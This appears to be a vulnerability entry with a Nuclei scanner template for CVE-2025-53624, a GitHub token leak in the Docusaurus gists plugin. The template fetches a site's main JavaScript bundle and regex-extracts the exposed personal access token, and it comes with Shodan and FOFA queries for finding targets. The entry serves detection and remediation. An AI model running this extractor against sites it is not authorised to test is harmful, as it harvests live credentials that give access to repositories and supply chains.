The Docusaurus gists plugin adds a page to your Docusaurus instance, displaying all public gists of a GitHub user. docusaurus-plugin-content-gists versions prior to 4.0.0 are vulnerable to exposing GitHub Personal Access Tokens in production build artifacts when passed through plugin configuration options. The token, intended for build-time API access only, is inadvertently included in client-side JavaScript bundles, making it accessible to anyone who can view the website's source code.
PoC代码[已公开]
id: CVE-2025-53624
info:
name: Docusaurus Gists Plugin < 4.0.0 - GitHub Personal Access Token Exposure
author: darses
severity: high
description: |
The Docusaurus gists plugin adds a page to your Docusaurus instance, displaying all public gists of a GitHub user. docusaurus-plugin-content-gists versions prior to 4.0.0 are vulnerable to exposing GitHub Personal Access Tokens in production build artifacts when passed through plugin configuration options. The token, intended for build-time API access only, is inadvertently included in client-side JavaScript bundles, making it accessible to anyone who can view the website's source code.
impact: |
A GitHub personal access token exposure vulnerability can grant an attacker unauthorized access to your repositories and organization resources, potentially leading to data exfiltration, code injection, and supply chain attacks.
remediation: |
Update docusaurus-plugin-content-gists to version 4.0.0+. Revoke access to the GitHub PAT that was used: https://github.com/settings/tokens.
reference:
- https://github.com/webbertakken/docusaurus-plugin-content-gists/commit/8d4230b82412edb215ddfa9e609d178510a5fe31
- https://github.com/webbertakken/docusaurus-plugin-content-gists/security/advisories/GHSA-qf34-qpr4-5pph
- https://nvd.nist.gov/vuln/detail/CVE-2025-53624
classification:
epss-score: 0.04611
epss-percentile: 0.88841
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
cvss-score: 8.6
cve-id: CVE-2025-53624
cwe-id: CWE-200
metadata:
max-request: 2
verified: true
vendor: webbertakken
product: docusaurus_plugin_content_gists
shodan-query: http.html:"Docusaurus"
fofa-query: body="Docusaurus"
tags: cve,cve2025,docusaurus,exposure
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "docusaurus_locale")'
condition: and
internal: true
extractors:
- type: regex
name: js_file_url
group: 1
regex:
- '<script src="/(assets/js/main\.[^"]*\.js)"'
internal: true
- method: GET
path:
- "{{BaseURL}}/{{js_file_url}}"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "personalAccessToken")'
condition: and
extractors:
- type: regex
name: github_token
group: 1
regex:
- ',personalAccessToken:"([^"]*)"}'
# digest: 4a0a0047304502205b06b89a94b8853ebbfe118114658fc99244424716553b8d1f83ec8a9688a259022100cdcf46b5ff68b77983781d9ece78682913cd0b7a58f4af54167ab541042b94f3:922c64590222798bb761d5b6d8e72950